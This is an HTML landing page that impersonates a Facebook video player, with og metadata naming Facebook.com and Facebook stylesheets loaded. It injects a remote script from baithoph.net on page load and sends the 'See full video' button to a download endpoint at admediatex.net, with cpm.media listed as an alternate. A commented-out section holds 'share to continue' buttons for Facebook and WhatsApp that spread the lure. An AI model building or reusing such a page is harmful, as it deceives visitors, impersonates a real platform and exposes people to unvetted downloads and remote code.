<html class="ssr fab rcs content-visibility dfr unselectable">
<head>
<!--- 
//////////////////////////////////////////////////////////////////
/////////////////////////// Telegram: KekusRF ////////////////////
//////////////////////////////////////////////////////////////////
-->

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Complet Video MP4 Download watch the full video in MP4 format</title>
<meta property="og:title" content="Complet Video MP4 Download watch the full video in MP4" />  
<meta property='og:description' content='Click to watch the full video in MP4 format. Facebook Videos' /> 
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Facebook.com"/>
<meta property="og:url" content="https://facebook.com" />
<meta property="og:image" content="https://videocomplet.github.io/player.png" />
<meta name="monetag" content="b6795cd1009e7bec26b22621da171561">
<script async src="https://www.googletagmanager.com/gtag/js?id=G-3P34ST6ZVZ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-3P34ST6ZVZ');
</script>
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/4RboS1gvD5A.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/E6Gh3uXd86R.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" crossorigin="anonymous">
<link href="https://static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/zoxrvTFJPCF.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" crossorigin="anonymous">
<script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('baithoph.net',6282054,document.createElement('script'))</script>
<style>
body {
background-color: #000000;
color: #ffffff;
}
.bg-s6 {
  position: relative;
  left: 100%;
  
  }

.bg-s4 {
  position: relative;
  left: 100%;
 
  }

@media screen and (max-width: 800px) {
     .bg-s6 {
  position: relative;
  left: 0%;
  }

      .bg-s4 {
  position: relative;
  left: 0%;
  }
}
:root {
--tiny-font-size: 12.0px;
--tiny-line-height: 16px;
--small-font-size: 16.0px;
--small-line-height: 21px;
--regular-font-size: 16.0px;
--regular-line-height: 21px;
--big-font-size: 16.0px;
--big-line-height: 21px;
--huge-font-size: 24.0px;
--huge-line-height: 32px;
}

 h1,h2,h3,h4,h5,h6 {
    font-weight: normal;
    margin: 0;
}

.ssr .m {
    position: relative; 
    box-sizing: border-box;
    display: flex; 
    flex-direction: column;
    flex-shrink: 0; 
}


.bg-s2::before {
position: absolute;content: '';width: 100%;height: 100%;box-sizing: border-box;background-clip: content-box;border-style: solid;border-width: 0px;border-color: rgba(0,0,0,0.0);border-radius: 6px 6px 6px 6px;background-color: green;z-index: -1;
}




.bg-s3::before {
position: absolute;content: '';width: 100%;height: 100%;box-sizing: border-box;background-clip: content-box;border-style: solid;border-width: 0px;border-color: rgba(0,0,0,0.0);border-radius: 6px 6px 6px 6px;background-color: rgba(8,102,255,1.0);z-index: -1;
}.bg-s4::before {
position: absolute;content: '';width: 100%;height: 100%;background-color: rgba(255,255,255,1.0);z-index: -1;
}.bg-s6::before {
position: absolute;content: '';width: 100%;height: 100%;box-sizing: border-box;border-style: solid;border-width: 8px 8px 8px 8px;border-image-source: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAARCAYAAAA7bUf6AAAAh0lEQVR4Xq2U3Q3AIAiEO4cjOqQbGUe4xgZTPGgCsd+bwOH5e10OABqAgZ05blxrANBJ+EVn7QNXReAGUQfM64gzACqAQhMViW+s5NxETdVixmnUZpBPYXPAiCPNMEthkYfRmEAAozGBAEbz156cn44kmNw9kYLzGyuN0mwNFglH/ivWZP+TG2ksvmc59cY6AAAAAElFTkSuQmCC);border-image-slice: 8 8 8 8 fill;z-index: -1;
}.bg-s7::before {
position: absolute;content: '';width: 100%;height: 100%;background-color: rgba(0,0,0,0.8);z-index: -1;
}
.Telefonos {
  display: none; /* Oculta el contenido para celulares por defecto */
}

@media only screen and (max-width: 800px) {
  /* Muestra el contenido para celulares cuando el ancho de pantalla es menor o igual a 600px */
  .Telefonos {
    display: block;
  }

  /* Oculta el contenido para computadoras cuando el ancho de pantalla es menor o igual a 600px */
  .Computadoras {
    display: none;
  }
}
</style>

<div class="m bg-s7" style="margin-top:-1px; height:565px; z-index:0; width:100%;">
<div class="m" style="margin-top:70px; height:6px; z-index:0; background-image:linear-gradient(to bottom, rgba(0,0,1,0.0),rgba(0,0,0,0.10980392)); margin-left:30px; width:340px;">
</div>
<div class="m" style="height:420px; z-index:0; width:340px; margin-left:30px;">
<div class="m bg-s4" style="height:412px; z-index:0; width:332px;">
<div class="m" style="margin-top:10px; height:90px; z-index:0; width:90px; margin-left:121px;">
<img src="https://videocomplet.github.io/logo.png" alt="" class="img contain">
</div>
<div class="m" style="margin-top:0px; height:64px; z-index:0; width:281px; margin-left:26px;">
<div class="fl ac">
<h2 dir="auto" class="native-text" style="width:281px; color:#050505;"><span class="f4">Enjoy the complete </span><br><span class="f4">experience</span></h2>
</div>
</div>
<div class="m" style="margin-top:14px; height:92px; z-index:0; width:280px; margin-left:27px;">
<div class="fl ac">
<div dir="auto" class="native-text" style="width:280px; color:#65676b;">Click <b>"See full video"</b><br>to watch the full video in MP4 format.</div>
</div>
</div>

<!---<a id="primerBoton" class="Computadoras" href="http://www.facebook.com/sharer.php?u=https://videocomplet.github.io&t=Click to watch the full video in MP4 format. Facebook Videos" target="_blank"><div role="button" tabindex="0" aria-label="Iniciar sesión" class="m" style="margin-top:46px; height:36px; z-index:0; width:300px; margin-left:16px;">
<div class="m bg-s2" style="height:36px; z-index:0; width:300px;">
<div class="m" style="margin-top:8px; height:21px; z-index:0; width:102px; margin-left:40px;">
<div class="fl ac">
<div dir="auto" class="native-text" style="width:20px; color:#ffffff;"><center><span class="f2">Share in Facebook to continue</span></center>
</div>
</div>
</div>
</div>
</div></a>

<a id="primerBoton1" class="Telefonos" href="whatsapp://send?text=Click to watch the full video in MP4 format. Whatsapp Videos + https://videocomplet.github.io" target="_blank"><div role="button" tabindex="0" aria-label="Iniciar sesión" class="m" style="margin-top:46px; height:36px; z-index:0; width:300px; margin-left:16px;">
<div class="m bg-s2" style="height:36px; z-index:0; width:300px;">
<div class="m" style="margin-top:8px; height:21px; z-index:0; width:102px; margin-left:40px;">
<div class="fl ac">
<div dir="auto" class="native-text" style="width:20px; color:#ffffff;"><center><span class="f2">Share in Whatsapp to continue</span></center>
</div>
</div>
</div>
</div>
</div></a>--->

<a href="https://admediatex.net/serve/dl.php?user=MjQxMg%3D%3D"  target="_blank"><div role="button" tabindex="0" aria-label="Iniciar sesión" class="m" style="margin-top:10px; height:36px; z-index:0; width:300px; margin-left:16px;">
<div class="m bg-s3" style="height:36px; z-index:0; width:300px;">
<div class="m" style="margin-top:8px; height:21px; z-index:0; width:102px; margin-left:99px;">
<div class="fl ac">
<div dir="auto" class="native-text" style="width:102px; color:#ffffff;"><center><span class="f2">See full video</span></center>
</div>
</div>
</div>
</div>
</div></a>

<br>
<div role="button" tabindex="0" aria-label="Crear cuenta nueva" class="m" style="margin-top:8px; height:36px; z-index:0; width:300px; margin-left:5px;">
<script type="text/javascript">
	atOptions = {
		'key' : 'a4cdba4f9d6bbc956f60d112fb478c0c',
		'format' : 'iframe',
		'height' : 50,
		'width' : 320,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="//www.topcreativeformat.com/a4cdba4f9d6bbc956f60d112fb478c0c/invoke.js"></scr' + 'ipt>');
</script>
</div>
</div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>

<script>
// Array con las dos URLs
var urls = [
  "http://cpm.media/serve/dl.php?user=MTU0OA%3D%3D",
  "https://admediatex.net/serve/dl.php?user=MjQxMg%3D%3D"
];
</script>